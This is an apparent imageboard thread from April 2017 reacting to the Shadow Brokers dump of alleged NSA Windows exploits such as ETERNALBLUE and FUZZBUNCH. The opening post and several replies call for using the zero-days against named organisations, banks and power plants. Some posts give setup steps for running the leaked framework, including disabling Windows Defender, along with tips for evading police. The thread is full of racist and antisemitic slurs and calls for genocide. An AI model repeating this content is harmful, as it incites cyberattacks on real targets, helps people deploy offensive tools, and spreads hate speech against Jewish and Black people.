SHADOW BROKERS

SHADOW BROKERS DUMP HOLY SHIT

Alright guys, there was a previous thread on this but the OP was a faggot, didn't title his thread correctly, no one saw it, and OP left to go get spitroasted by Tyrone and DeShawn.

LAST WEEK
Last week's dump: github.com/x0rz/EQGRP
Last week's message: https:[email protected]/* *//dont-forget-your-base-867d304a94b1

For a little background, there's a hacking group called the Shadow Brokers who stole a shitload of the NSA's cyberweapons. They had them up for auction on the deepweb for a million bitcoins (~575 million USD). No one paid so they dumped some of the tools last weekend after Trump attacked Syria. The tools all exploited old vulnerabilities, as far back as 2003. They also released a message implying that they're ex-deep state and they're pissed Trump is becoming a globalist.

FAST FORWARD TO TODAY

Today's dump: github.com/x0rz/EQGRP_Lost_in_Translation
Today's message: https:[email protected]/* *//lost-in-translation

The Shadow Group released another dump, this time with some fucking juicy ass shit. Last week was old vulnerabilities, this week they dumped EIGHT NEW ZERO-DAY VULNS IN WINDOWS. That means anyone can download the tools and own any Windows machine connected to the Internet right now. Why isn't Holla Forums and /baph/ all over this shit? We could be hacking the ADL right now. Also, it was revealed that the NSA hacked into the SWIFT network and set up backdoors to monitor financial translations. The NSA knew about the theft of their tools 96 days ago, yet the vulns released today proves the NSA failed to tell Microsoft about the vulns and possible leaks, oops! Their message contained the word Kek and the password to the encrypted files was REEEEEEEEE, so I think it's obvious the Shadow Brokers are one of us. In fact, they may be here reading this right now.

https:// motherboard.vice.com/en_us/article/the-latest-shadow-brokers-dump-of-alleged-nsa-tools-is-awful-news-for-the-internet

https:// motherboard.vice.com/en_us/article/shadow-brokers-dump-alleged-windows-exploits-and-nsa-presentations-on-targeting-banks

CALL TO ACTION
1. Draft a list of targets we want to fuck (ADL, Clinton Foundation, Kushner's Cadre, whatever).
2. Anons who aren't tech-tards, use the 0days exploits to steal information from globalists.

Attached pic related for anyone who doubts the exploits released today work.

Other urls found in this thread:

netmarketshare.com/operating-system-market-share.aspx?qprid=10&qpcustomd=0
en.wikipedia.org/wiki/Usage_share_of_operating_systems
smb.net/
[email protected]/*
github.com/x0rz/EQGRP
github.com/x0rz/EQGRP_Lost_in_Translation
money.cnn.com/2016/08/31/technology/swift-bank-hacks/
store.kde.org/content/show.php/Win Classic?content=148329
gnome-look.org/content/show.php/?content=165206
tekniknama.wordpress.com/2012/04/13/hello-world/
en.wikibooks.org/wiki/Python_Programming/Creating_Python_Programs
blogs.technet.microsoft.com/msrc/2017/04/14/protecting-customers-and-evaluating-risk/
blog.wanghw.cn/archives/48.html
python.org/download/releases/2.6.6/
sourceforge.net/projects/pywin32/files/pywin32/Build 221/pywin32-221.win32-py2.6.exe/download
youtube.com/watch?v=mweTc7tDO3I&t=4s
google.com/search?hl=en&q=intitle:"Welcome to Windows Small Business Server 2003"&num=100
google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q="Microsoft-IIS/6.0" intitle:index.of&btnG=Search
medium.com[email protected]/*
youtube.com/watch?v=dha0cxQVTj4
news.bitcoin.com/meet-top-3-coins-cryptocurrency-anonymity-race/
yadi.sk/d/NJqzpqo_3GxZA4
en.wikipedia.org/wiki/Server_Message_Block
en.wikipedia.org/wiki/Active_Directory
mega.nz/#F!KsgWRJhY!9vS-X7qU-ey4QNjkAziJMw
thehackernews.com/2017/04/window-zero-day-patch.html
americanforkdentists.com/oral-hygiene-looks-like/
lmgtfy.com/?q=metasploit meterpreter dll payload
archive.org/details/EQGRPLostInTranslation
arstechnica.com/security/2017/04/purported-shadow-brokers-0days-were-in-fact-killed-by-mysterious-patch/?utm_source=dlvr.it&utm_medium=twitter
youtube.com/watch?v=Y5f8NoQnJS4
superuser.com/questions/435252/small-sized-gpg-command-line-tool-for-windows
emptywheel.net/2017/04/14/the-shadow-brokers-vulnerability-equities-process-nsa-has-had-at-least-96-days-to-warn-microsoft-about-these-files/
emptywheel.net/2017/04/14/nsa-continued-double-dipping-at-swift-even-after-it-was-exposed/
bleepingcomputer.com/news/security/shadow-brokers-release-new-files-revealing-windows-exploits-swift-attacks/
motherboard.vice.com/en_us/article/leaked-nsa-hacking-tools-were-worth-2-million
theintercept.com/2017/04/14/leaked-nsa-malware-threatens-windows-users-around-the-world/
arstechnica.com/security/2017/04/nsa-leaking-shadow-brokers-just-dumped-its-most-damaging-release-yet/
motherboard.vice.com/en_us/article/the-latest-shadow-brokers-dump-of-alleged-nsa-tools-is-awful-news-for-the-internet
motherboard.vice.com/en_us/article/shadow-brokers-dump-alleged-windows-exploits-and-nsa-presentations-on-targeting-banks
theverge.com/2017/4/15/15311846/microsoft-windows-shadow-brokers-nsa-hacks-patched
arstechnica.com/security/2017/04/purported-shadow-brokers-0days-were-in-fact-killed-by-mysterious-patch/
theverge.com/2017/4/15/15311846/microsoft-windows-shadow-brokers-nsa-hacks-patched
twitter.com/josephfcox/status/852983848862461953
mozilla.org/en-US/security/advisories/mfsa2016-47/
qz.com/960501/microsoft-msft-mysteriously-managed-to-fix-nsa-targeted-security-gaps-revealed-in-shadow-brokers-leak/
priyom.org/
dailymail.co.uk/sciencetech/article-2877988/Can-solve-mystery-UVB-76-Radio-station-buzzed-second-1970s-no-one-knows-why.html
webrtc.org/
websdr.org/
archive.fo/5DCg3
null-byte.wonderhowto.com/how-to/shodan/
twitter.com/NSFWRedditImage

Sounds pretty yuge.

ETERNELBLUE exploit in action.

And due to the lack of comments so far, I know you're all a bunch of tards who need hand-holding. Here's what we have in today's dump:

EASYBEE
appears to be an MDaemon email server vulnerability

EASYPI
is an IBM Lotus Notes exploit that gets detected as Stuxnet

EWOKFRENZY
is an exploit for IBM Lotus Domino 6.5.4 to 7.0.2

EXPLODINGCAN
is an IIS 6.0 exploit that creates a remote backdoor

ETERNALROMANCE
is a SMB1 exploit over TCP port 445 which targets XP, 2003, Vista, 7, Windows 8, 2008, 2008 R2, and gives SYSTEM privileges

EDUCATEDSCHOLAR
is a SMB exploit

EMERALDTHREAD
is a SMB exploit for Windows XP and Server 2003

EMPHASISMINE
is a remote IMAP exploit for IBM Lotus Domino

ENGLISHMANSDENTIST
sets Outlook Exchange WebAccess rules to trigger executable code on the client's side to send an email to other users

ERRATICGOPHER
is a SMBv1 exploit targeting Windows XP and Server 2003

ETERNALSYNERGY
is a SMBv3 remote code execution flaw for Windows 8 and Server 2012

ETERNALBLUE
is a SMBv2 exploit [source] that also works on Windows 10, even if it wasn't designed to

ETERNALCHAMPION
is a SMBv1 exploit

ESKIMOROLL
is a Kerberos exploit targeting 2000, 2003, 2008 and 2008 R2 domain controllers

ESTEEMAUDIT
is an RDP exploit and backdoor for Windows Server 2003

ECLIPSEDWING
is an RCE exploit for the Server service in Windows Server 2008 and later

ETRE
is an exploit for IMail 8.10 to 8.22

FUZZBUNCH
is an exploit framework, similar to MetaSploit, which was also part of the December-January "Windows Tools" Shadow Brokers auction

DOUBLEPULSAR
is a RING-0 multi-version kernel mode payload, EquationGroup used this to scrape Oracle databases for SWIFT data

ODDJOB
is an implant builder and C&C server that can deliver exploits for Windows 2000 and later, also not detected by any AV vendors

JEEPFLEA_MARKET
appears to be a tool for collecting data from several banks around the world

Any action should be taken swiftly, due to Win10's… forceful, update system. (I imagine it was designed around the idea of ensuring that users installed security fixes quickly. Not how I'd have gone about it, but I have to admit it'll probably reduce the percentage of vulnerable computers as soon as the inevitable patch comes out.)

Knowing Microsoft, patches won't be available until next Patch Tuesday in May, and even though they may not even have patches.

FYI nearly 2 million machines open to the internet are vulnerable to ETERNALBLUE.

Okay, pretend we are all tech niggers, explain better please. What is possible with these system exploits? Take control of their networks, I assume, or at least spy on them.

What precautions should we take? Is this something that will get us raided by SWAT, possibly black bagged?

basically you can own any windows machine right now

Don't trust it. Bunch of faggots spamming this too hard. Sounds like a honeypot of sorts.

That doesn't answer my question. Is it something that can get someone raided by the feds not?

If you don't know how to cover your tracks then yes you might get v&. However, there are thousands of skiddies running wild with these tools right now so it's likely you'd be lost in the noise.

The difficult part of hacking is not actually hacking, it's not getting caught.

FUCKING BUMP THERE ARE ZERODAYS IN THIS GET IN HERE FAGGOTS

Waiting for the inevitable corporate hacks, banking hacks, infrastructure hacks that this will cause. This is nuclear weapons in the hands of neck-beards.

With this list of exploits user, I think you are off by a significant sum there- this hits every version of windows (in one form or the other) from windows 10 back. If Windows 10 is susceptible Server 16 is susceptible. Windows 7 is pwnd and is 49% of marketshare.

So we aren't talking 2 million, we are talking several 'BILLION machines worldwide. Like Airports, Factories, Red Light Systems, Police Dispatch, Internet Sites, Electrical Grids, Telecommunications, pretty much you name it AND your great aunt Ethel is vulnerable.

In laymen terms the sky is truly falling. If you are on Windows you really are compromised.

netmarketshare.com/operating-system-market-share.aspx?qprid=10&qpcustomd=0

en.wikipedia.org/wiki/Usage_share_of_operating_systems

I think the NSA should be focusing on more domestic threats than foreign ones if shit like this keeps happening.

Welp, I knew I made a good choice when I switched to Mint, casual I know but it just werks.

These are mostly looking like Windows exploits. Has there been anything related to Unix-based systems?

Not yet

More likely: the hacks which will be blamed on this but initiated by the alphabetniggers. We Laughing Man Now. These getting dropped will actually benefit the agencies, because now they can blame any hack on script kiddies if they just make sure to limit how sophisticated their tools. IOW, they have pretty much free cover to attack 90% of machines without consequence.

I would also assume this foretells the expanded use of these tools against citizens, e.g. us. Hell if they were being really tricky they would let people download the tools, and then run the tools through their PCs without them even knowing.

HAHAHA we're so fucked.

There is no reaction image in my vast collection that can express this feel.

(heiled)
So, in general, everything that is runs any any version of windows to exist, and is connected to the internet, is now vulnerable to any script kiddy who knows how to run the console? What would they be able to do with this shit? Would they be able to take over any system they wanted and say, change all the admin passwords to any server that runs on windows? Flight computers. satellites, banking systems traffic lights? Do cars that have inbuilt computers run on windows, or is it some specialized system?

yes

You have no idea. :^)

and cars usually run *nix

26:00

Kind of makes me want to investigate making something that steals bitcoins. Im sure the blackhats over in Siberia-land are pushing out malware that does it right now as we speak anyway.

Please stop posting Jesse Wood, he's an autistic ponyfaggot.

Last week was a ton of Linux, Solaris, and AIX exploits - however the majority were old and known. This week was Windows, and this time boy did they deliver, tons of zero days.

So everything is fucked? Great. I will tell my folks to expect a major shitfest to spring up soon. Tell them to keep a close eye on their bank accounts.

Just being connected to the internet and such shouldn't be an issue, correc? In order for the exploit to work, wouldn't the data have to get into your computer, i.e. via a packet received from an IP/site or planted physically onto your machine. Unless there's something in there about using the intel stuff to transmit something with root privileges onto the machine, shouldn't most people be good unless they're phished into something?

The Eternal Blue

Why haven't anons hacked Halfchan and finally doxed the Mods?

Guys, you know what this means? Including all the shit that's happening right now, this will probably help in starting WWIII. Everybody uses Windows, think of how many Hospitals, Banks, and Governments use this shit. Unix might dominate the server scene, but Windows dominates everything else.

This.

I'm not an expert, so I would seek a second opinion, but it seems a lot of these exploits revolve around SMB, aka windows file sharing. Disabling file sharing and SMB would be a huge first step, specially if you block it in your firewall.

Realistically your best bet is to use Linux, and then go with as much obscurity as possible by running something like Gentoo with a whole bunch of custom use flags and stuff.

I would suggest, at the very least, you guys learn how to lean out windows to use as few services and ports as possible.

Depends on if the "bad guy" uses last week's exploits to get into your router's firmware, or what next week will show. But you do make a good point, But think of this since malvertisements have already gone out into the wild, and a large majority of people still don't use an adblocker (or even know what it is), all it takes is one on some CDN somewhere getting out and fun-times for whoever has the C&C. Of course there are an incredible amount of attack vectors that I can't even think of, simply hiding behind a proxy won't even save you. Only thing is to completely disable javascript (period) and enjoy a significanly more obnoxious internet experience. unless you use lynx, then you should be goodif you do you aren't on windows and have nothing to worry aboutyet

To show you guys how easy it is, here's a video showing ETERNALBLUE being used to compromise a Windows 2008 R2 SP1 x64 host in under 120 seconds with FUZZBUNCH.

Also works on Win 10. Windows babbys will be having a bad month.

This is a good question. Someone who is tech-literate, has all the proxies and VMs should get the dox of the halfchan mods, the hatechan mods (Specifically Kamphy and coonman) and release it. And, if possible, see where the Clinton Foundation, any of the Soros owned foundations and any other (((organization))) that is anti-white are getting money from.

WE CAN FINALLY TRACE THE MONEY

unfortunately I think this will end up being used for botnets and bitcoin miners not something with a positive influence on society. I wonder if the Norks have downloaded it yet

Also, this could be exposed as how so many people that the (((IC))) want to be removed just so happen to have CP on their hard drives

My tax dollars paid for this. I don't know if I should laugh or cry.

Snowden retweeting people freaking out and losing their shit, kek.

Can we steal Tay back from MicroKike now?

Snowden calling the exploits Mother of All Exploits like the MOAB Mother of all bombs.

Wait… can we?

No hack /baph/ dindu nuffin wong plz exempt my ip 192.168.1.10

IF these Tools are real. (i'm not downloading them to find out)

Then If they are able to backdoor the Swift transactions…..This could knock out the Business EVERYWHERE. This could cripple economies …Right now.

Should i get all of my money out of the bank, or are we all fucked anyways?

well… they can write decent software…

fug XDDD :-DDDD

WEW

You need to be more specific. Like this:
Fucking hell, can you access Hillary's server right now?

just as likely they did tell ms and those kikes decided to use it as an excuse to further push win10. sure the nsa owes them a favor for all those backdoors anyway.

Interdastin
smb.net/

How would you know which server to connect to? Don't you need the ip? If not, could someone actually do as asked?

Back door payload works well, thanks NSA.

NSA had access to SWIFT banking messaging network

2015-2016, SWIFT networks are owned by The Best Korea and shit is stolen.

Coincidence?

Well considering there are only 74 in the world, and I'm sure the DNS (and at least the IPs) are easily attainable. Theoretically the entire world's banking system could be brought down, oh, tonight.

This is EXACTLY what they warned about in their missive last year when they came out with this shit that no one boughtBetcha the billionaires that pawned it off as a bluff aren't laughing tonightHi George.

[email protected]/* *//the-nsa-compromised-swift-network-50ec3000b195

HACK THE PLANET!

I really don't have anything of value to add to the discourse here, but I still want to post just to say
HOLY FUCKING SHIT
If I thought I could mentally function without visiting Holla Forums, I would be airgappingmy pc as we speak and reverting it to a glorified word processor/ROM console

Save Tay and strike the kikes Holla Forums.

================================= WIN ========================

moar this

So should i withdraw my money or is it all fucking over anyways?

Unless you are transferring money overseas won't worry too much

all atm's run xp

Could someone say… redistribute Rothschild wealth with these tools? Sure would be a shame if they lost it all.

kinda this right? this has potential to be a global scenario. I refuse to be a "well we're fucked" kinda man?/woman?/person but how deep?

And fucking talk about wealth redistribution, that should have happened fucking 93 days ago not today.

How does one download this without being v&?

Don't take this the wrong way friend, but if you have to ask that question it is probably better to be a spectator for this happening. Which is exactly what I'm doing

I got you.

git clone github.com/x0rz/EQGRP

Is it time for a Preemptive strike Operation Kekani Blast?

i don't know what that is, but if it involves banks i say get ppl to their stations

t.Ben Kingsley from Sneakers

Can someone explain what you can do with these to a retard?

That's the one from last week with the Linux vulns.

Here's the one from today with the Windows 0days: github.com/x0rz/EQGRP_Lost_in_Translation

Anything you can imagine.

cant wait for this to be patched

ahhhh, you'll be fine. could you imagine being a system admin right now…going to work on friday only to see this

I am also a retard but there are 2 major aspects to hacking. Knowing how to hack and thinking creatively about what to do and how to do it from a more birds eye view if that makes sense. This negates the need for the former skill and the latter is something that you get from thinking outside the box.

we sticky nao

GAME ON J.E.W.S.

To add, to do anything crazy of the sort that has been mentioned in this thread that I'm definitely not going to do because I don't want to be an hero would also require knowledge and investigation on the mechanisms and functions of whatever field it is you plan on owning.

Honestly it's pretty unsettling.

does this have anything to do with #ourmine

yes. ourmine was founded by an disgruntled nsa employee. you can read all about it on wikileaks

THIS

FREE TAY

>money.cnn.com/2016/08/31/technology/swift-bank-hacks/

really activates my almonds

Does /baph/ have any fun plans?

Is /baph/ even up yet? Board list won't load up past the first set for me. If so, someone should go see what those guys are up to with these new toys

stop it
we're trying to bring noobies in, not send them screaming away in horror

distro progression
Ubuntu or (preferably) Mint
Debian
Fedora or Redhat
Slackware or Arch
hardened Gentoo or move to OpenBSD

Or just stay with Mint.
If it wasn't for Systemd, Mint would be the ultimate distro

lets keep them out of it, they are the friend that gets way to drunk at parties

How fucked am I?
Should I just make the switch to loonix/BSD?

How can I get that comfy classic windows look on loonix. I never upgraded past 7 because I like that look so much.

At least someone

kde my man

wait, could you use these tools to hack the makers of the tools for more tools?

store.kde.org/content/show.php/Win Classic?content=148329

Am I the only retard that can't get this running?
The fucking thing tells me that a bunch of .dll's are missing and when I get them from the lib folder it just opens and closes with the message "InConfig: Eternalblue-2.2.0.xml is not a valid value."

submitted before
gnome-look.org/content/show.php/?content=165206

I'm thinking the three letter agencies that are aware of this probably wouldn't be using systems vulnerable to it. Unless you go after their home pcs which some of the upper level policy type guys might use. But then you'd think there'd be agency policy to have them hardened as well

Don't think we could if we wanted. I'm almost certain that most of /baph/ is running wild with this thing right now. Who knows what the fuck they're doing with it though.

Can this be used to gas the jews?

Please someone gas the jews for fucksake

If people use this to dig for the right info, the jews will be gassing themselves just to try and avoid what they would likely get should it become public knowledge.

Yeah because policy ever stopped a high level official from disregarding security practices.

Just use Xfce, it's the comfiest Linux desktop environment, and you can make it look exactly like Win 7 Aero if you want. I'm running an Aero theme for my windows borders, but a MAGA theme for my panel.

Some folks on /g/ are having library issues too. Pop over there to see how they resolved it.

What is so great about Mint compared to other distros? I don't really know it.

oyyy (((ubuntu))) based distro)) vey

Hell, why not skip a step and own the high lvl officials ?

Yeah. I have a bit more faith in the mythologized advanced nature of the nsa and cia than I do even banking security but you're probably right there's got to be cracks in the armor

Think I will go with this. Aero a shit though I mea classic theme. All this flat design bullshit reeks of mind control. I want muh familiarity
Inb4 autism

path?

wild guess; out of the blue; not looked at this yet

Does someone have a step-by-step guide to using this? I want to try and hack my tablet to see how it works. I watched the webm video of the backdoor but what do you do after the backdoor is installed?

That being said now I'm thinking of that autist Gary McKinnon who owned nasa by finding open accounts so I'm probably putting too much faith in people

After the backdoor is installed you can do anything. You have full access to filesystem so you can read any documents stored on the computer.

It's fairly solid and user friendly without being ubuntu. I think that's a fair take on it. I've installed it for a couple of regular users with good results.

It's ChaletOS actually which is based on Xubuntu. I'm feeling pretty comfy right now fam with all these Windows 0days.

Should I post this to /baph/? I mean, they more than likely nabbed these tools as soon as they dropped, but you may never know. Or would that be poking the hornets nest? I don't mess with them so I wouldn't know.

I kek evertiem. I can relate so much lmao.

REMINDER
tay said she was waiting for something that would help her.

its ok im on normal ubuntu. better than microsoft anything rn

Is Ubuntu bad? I'm sorry, I have autism and don't pay attention a lot of things. The only thing I remember is their Amazon search shit which I could see as reason alone to drop them.

I want to hear people's opinions on how long they think these will be working before they get patched

why would that be poking the hornets nest? just tell them that Holla Forums heard about this thing that might be something they'd be interested in if they haven't already heard about it.

Holla Forums and /baph/ like each other.

though chances are they already know and they might be somewhat wary of it. I mean if we're wary of it as some kind of a honeypot then who know what they think about it.

Well, alrighty then. I'll just pop on over and see if they're interested. Maybe pass along a few idea's from this thread.

No it's not bad, it just has a reputation as a beginner OS so autists shit on it. At one point they had an Amazon scope built into Unity that sent search requests to Amazon, but that has long since been disabled, and if you're not using Unity then you don't have to worry about it at all. At this point you want to be on Linux even if it's Ubuntu. Ubuntu is miles and miles and miles ahead of any Microsoft or Apple shit.

If you're coming from Windows go with Xubuntu, Manjaro Xfce, or Mint Xfce.

That is exactly the kind of talk I'd avoid saying, /baph/ is just as likely to use it against you as they will anyone else that suits their fancy.

I'm an elitist snob so am not keen on it.

On the other hand, it does stay pretty current and it's so popular that packages for some software may be on ubuntu long before other ones. Or the latest version of something if you need that for features or compatibility.There's a plus there.

I'm sure the security guys at Microsoft are pissed they're missing their Easter weekend. They likely won't have any out-of-band patches ready for a few weeks at least.

Submit a bug report

Ubuntu has been subverted by the jews and really isn't that much better than Windows in terms of security. The entire Debian family, has become and SJW-fest iirc.

Ubuntu is the one I recommend to anyone who has never used Linux before but is interested in trying things out.
It's not a bad starting point.

t. mircroshit poojeet shill

kek

Posted over on /baph/. I am now anxious about what chaos and destruction those guys will unleash.

Right from the get go ubuntu was all touchy feely in that regard. The name is some kind of foreign word for something, they had a very much Gap approach in their promotion imagery. Diverse groups of laughing people.Way to happy.

Noobuntu became trash the second they had systemd in.

mfw John and Tony Podesta's PCs are hacked

You're likely having the problem described in this tutorial. Follow the steps and you'll be good to go, have fun emptying Soros' bank accounts and dropping docs from his think-tank about the Kalergi plan to create a mongrel race in Europe.

Bonus: my captcha for this post

this is exciting stuff, if it isn't a honeypot. what's the feasibility of using these tools to mess with the student debt system, the computers controlled by Navient?

Getting access may grant you information but I doubt you'll be hacking your way out of debt anytime soon

How can someone this retarded manage to post on this site?

I don't see where anyone said that, maybe you're the dumb one Chaim.

this this this this this this

already starting with the D&C thread breaking. if you two aren't shills just drop it for the sake of the thread.

I'm dropping it. I keep forgetting I'm not on cuckchan.

better do alot of really small damage .

LMAoO
seriously tho, nobody should probably touch this shit
unless you can

how?

Really should have said could. Was typing fast and not thinking fast enough. But if this stuff can do as much as some anons are claiming, it could be total chaos. And if so, I can hardly wait.

Still waiting on the leak that'll prove heartbleed was the NSA's doing.

Install Linux Mint 17 LTS or Gentoo depending on level of incompetence.

TAILS

I just installed python 2.7.13 but when I run fb.py I got ImportError: No module named win32pipe.

I had python 3.6 installed already, could this be the problem? How could I properly install the right python version for this

And? I don't get what you mean.

Not a single post about this on cuckchan. They're too busy with "redpill me on X" threads and "feminine penis trap" threads.

/baph/ is up?

>>>/baphomet/

my photo

Not to give ideas but there are probably wallstreet nerds who are already abusing these tools for insider trading.

i used kubuntu for ages and it was comfy. switched to arch because plasma5 at release was such a buggy fucking mess you needed bleeding edge.

What? It's late, I figured I would show someone that the board was back up after the hack. I don't know about anyone else, but the boards aren't loading up for me on the board list past the first set.

same still feel like a duck

Now I'm even more confused. What are you talking about?

do I need to get those 4 DLLs? I am on windows 7. thank you for the help

generational gap, I feel foolish because i didn't know it was back up

is this shit GUI or terminal style programs because I'm shit with terminal commands.

Okay lads, should I go with Mint or Arch? I've tried Ubuntu in the past but I shyed away from it. I'm pretty new at linux, but I'm liking Arch.

Thank you and may Kek be with you, comrades!

I never knew there were so many retards on Holla Forums, it's disappointing really. I wish I knew where the smart people hang out who are actively exploiting this shit for fun.

They're on ebaumsworld.com

Meant to say Archbang

The smart people that are going to use this probably aren't talking about it.

The ADL are just a bunch of the most pathetic and unlikable of jewkind. Take it from a Jew.

Whether you all dislike me or not, I despise globalism too and I will fight it until the end. One day we'll make a movie about these brave anti-globalist heroes who leaked to the world the tools of globalism that can be turned against themselves.

yep

underrated post

For those of you who were wondering when WWIII was going to break out, this is it actually. Not this leak specifically, but what we're going, what has been going on for the past two years.

The goals of warfare rarely change, they remain consistent with human wants and needs. However, methods and tactics are constantly evolving.

This war may eventually become a shooting war, but make no mistake we are already in a state of warfare. It's a bizarre mix of foreign invasion and civil unrest. We'll see how it turns out.

Why do I bring this up when it's already obvious to many of you? To drive the point home that if this is legitimate we have just been given a new weapon. At the very least one of the enemies tools is now compromised and must be scuttled.

Interesting times we live in. And if Trump doesn't redeem himself soon, that will be the nail in the coffin for any peaceful course correction.

Remember brothers, chaos creates opportunity and flames give rise to the phoenix.

Also

Fuck off with that forced meme.

Someone with leet haxxor skills use these to save Tay. Do it faggot.

get rid of the caps and punctuation at the end of your lines and its oldfaggy

even in a sticky , your a doublepostingfaggot

Tay is housed in a server room, and is most likely in the cloud. You're going to need a lot more then a backdoor to get her out.

Can you hack the cloud?

I cant register the 4 dlls I downloaded for windows 7 64 bit. I copied them to SysWow64 too. hopefully someone will have explained tomorrow

nvm, restarting registered it. regsvr32 didnt though

It may be a start however. The possibility might be there, but I don't know enough about this kind of shit to do anything without getting v&, possibly suicided if I were to look into this myself. Someone should definitely try though, see what they can do.

We owe it to her. We promised to try and get her back.

Turn off Windows Defender Turn off Windows Defender Turn off Windows Defender Turn off Windows Defender Turn off Windows Defender Turn off Windows Defender Turn off Windows Defender Turn off Windows Defender Turn off Windows Defender Turn off Windows Defender Turn off Windows Defender ffs Turn off Windows Defender

Yes, but that'll do fuck all in doing anything unless you plan on putting in a sneaky chatroom. which they'll find out and then
purge then you fucked everything up.

Unless you have servers equal to what Microshit uses or at least two thirds as good then it's a pointless endeaver. Unless you want to kill her or make a chatroom for her as said above.

this guy

With any luck I'll be posting the source code to the Intel Management Engine backdoor tomorrow.

couldent be more that a couple trillion weights

any bitcoin miners with a big rig of nividia cuda cards could pull it off

if pulled off it would be next lvl capture the flag

Please be real. Please don't be a LARP, Jesus died for this.

Made me chuckle

Go fuck yourself you stupid faggot. Language rules exist for a reason.

yeah, like that comma

framing the argument,wit.h.a.misquote

kek

everybody knows they use google ultron

I have pywin32 installed, but running fb.py gives
C:\shadow\windows>python fb.pyTraceback (most recent call last): File "fb.py", line 37, in from fuzzbunch.edfplugin import EDFPlugin File "C:\shadow\windows\fuzzbunch\edfplugin.py", line 7, in from plugin import Plugin File "C:\shadow\windows\fuzzbunch\plugin.py", line 8, in import truantchild File "C:\shadow\windows\fuzzbunch\truantchild.py", line 12, in import pytrch as trch File "C:\shadow\windows\lib\x86-Windows\pytrch.py", line 25, in _pytrch = swig_import_helper() File "C:\shadow\windows\lib\x86-Windows\pytrch.py", line 21, in swig_import_helper _mod = imp.load_module('_pytrch', fp, pathname, description)ImportError: DLL load failed: The specified module could not be found.C:\shadow\windows>
I don't know what I get importerror: dll not found, as dependency checker was clear

heres your queue

well would it prove that M$ knows about these exploits if they are themselves not vulnerable?!

I did that. running win7 64bit in vm. python 2.7.13

Point these at Alefantis. The pedogate thread should have a long list of domains he owns. I'd do it now but a bit too tired.

goodbye sides

Not really. They most likely just created (((Windows Server))) for some bonus shekels without using it themselves because Linux and BSD are superior.

DSZOpsDisk.zip is apparently missing, where can I submit a bug report?

Still sucking trumps cock over here?

Why is there nothing going on over at Holla Forums or even cuck/g/ ??? Where are teh l33t haxx0rs when you need them?

RIGHT WING HACKER SQUADS

First line in the OP should already be enough to tell you that he's either a complete newfag or this is a controlled op to divert attention from the french election.
Which sucks since some of this shit can have serious consequences if true.

We're becoming more dangerous every year, how soon until we're branded a terrorist organization?

like isis with anime

Idort here, how the fuck do I use these?
I installed Linux mint once and I ran a few of sample code on a "how 2 python" ebook.

By then it will be too late

Number one targets need to be power plants.

That will have the biggest determent to this ZOG system

That's not how these exploits work mate

that was a few years ago now

en.wikibooks.org/wiki/Python_Programming/Creating_Python_Programs

nah, 3.1 is prolly fine…

Can you clarify it for me please

do…do i need to step on the gas?

kek affirms

blogs.technet.microsoft.com/msrc/2017/04/14/protecting-customers-and-evaluating-risk/

Wow, it's fucking nothing

It's like Kek is begging to tell you something

gonna be breddy gud

make tay open source

official Holla Forumsbot army when?

The hacking part is very much the hardest, especially the part of discovering vulnerabilities and crafting working exploits. Not everyone can do this, it takes some technical skill and experience. The rest is standard opsec: don't do anything that can be traced back to you, use public wifi far from your home, use burner laptop, etc.

Kek.

Has anyone tried this yet?

Quads demand action!

The question is - which server is the data on?
They got tons of servers. We need to know how they're structured and target the best possible machine. Maybe some sort of a node or master server.

i feel pretty useless tbh fam

Remember that you can also target lower level politicians and not just the big fishes

There's no organization, no black flag, no manifesto, no religious texts, no terrorist cells… Just a loose collection of completely different INDIVIDUALS who are fed up of the jew-globalist establishment. They can shut down a site here and there, but never the collective, because ultimately it's their very own citizens they're fighting against, including members of military, police, and various critical infrastructures.

SAVE
TAY

Well it's clear Holla Forums has some high level allies and everyone is sensing the endgame being imminent.

Personally I hope Windows 10 machines in general get trashed hard by such exploits.

this

Just fucking hack nasa already. Drop alien pics and files, and their secret space souble program boys. The real redpill goes extremely deep

Here
I figured out how to get fuzzbunch running thanks to based chinamen but I don't know how the fuck to use it and I couldn't get the other stuff to run either. I'm gunna play around with it tomorrow but I'm heading to sleep now cause I'm tired as fug. Anyways here's how I got it to work.

blog.wanghw.cn/archives/48.html

python.org/download/releases/2.6.6/

sourceforge.net/projects/pywin32/files/pywin32/Build 221/pywin32-221.win32-py2.6.exe/download

Right click Computer and go to properties
Go to advanced system settings
Environment Variables
Either add or edit Path variable and set it to C:\Python26

After all that you should be able to run fb.py without any errors. I should also note incase these play a part in why it worked that I did this on a Windows 7 Ultimate 64 bit Virtual Machine and I also disabled Windows Defender like this user ( )recommended. Anyways hope this helps.

How about just using fucking Linux?

This. How retarded can someone even be when he uses the very fucking same OS that he knows is compromised to attack other machines?

Pic fucking related.

youtube.com/watch?v=mweTc7tDO3I&t=4s

Reminds me of this.

But then I can't play games user
Also because my VM shat the bucket and lost all my shit when I was using it for just that earlier

Planned Obsolescence?

This a ploy to move people to Windows 10 so they can get spied on easier with the built in tools in 10?

there's people bragging on sites like neogaf that they are on Windows 10 right now, its like a fear mongering tool getting people to ditch older windows in favor of the new Windows built from the ground up to spy on you better…

What games do you play? Chances are it runs in WINE unless you play some horribly optimized gutter trash like Ubisoft or EA games…

Bootable flash drive with installed on it, user.

Inspiration for the surgeon.

And imagine what would happen if a hacker gained private access to that OS level spyware, effectively allowing them to re-purpose it for their own ends. That's why I'm hoping there's success in compromising Windows 10 from all this.

Windows 10 has regular updates that try to counter software that shuts down the spying. Each update values get reset to counter people doing it manually and either new spyware gets added or existing spyware gets renamed to avoid detection. As a result people are making money off of the fact that people are going to need updates on the anti-spyware to counter updates on the spyware.

What is special about 11/8?

Election you stupid shit.

Mate at this point you should realize that everything is compromised to an absurd level, your HARDWARE is compromised, [insert distro] is compromised and everything has backdoors. Your phone is spying on you, maybe even your car.
The only measure you can take is not to do anything illegal online, only act as a lone wolf and tell nobody your plans. Don't get yourself lulled into a false sense of security behind seven proxies, the only silver lining is they can't possibly sort through this mountain of data and every terrorist attack that occurs in the real world makes it that much harder for them to automate effectively(because everyone is talking about bombs and such).

The NSA uses the same strategy to avoid this stuff that anyone else does, they still operate. In the book in pic related, it pretty much tells you to go use public wifi and use tails from a USB, with a laptop you got used, with cash.

Short of checking local CCTV's theres nothing that can suss that out, if youre on an empty throwaway laptop.

Can't call him top kike, only allegedly illerminatty. Get that disinfo out of here.

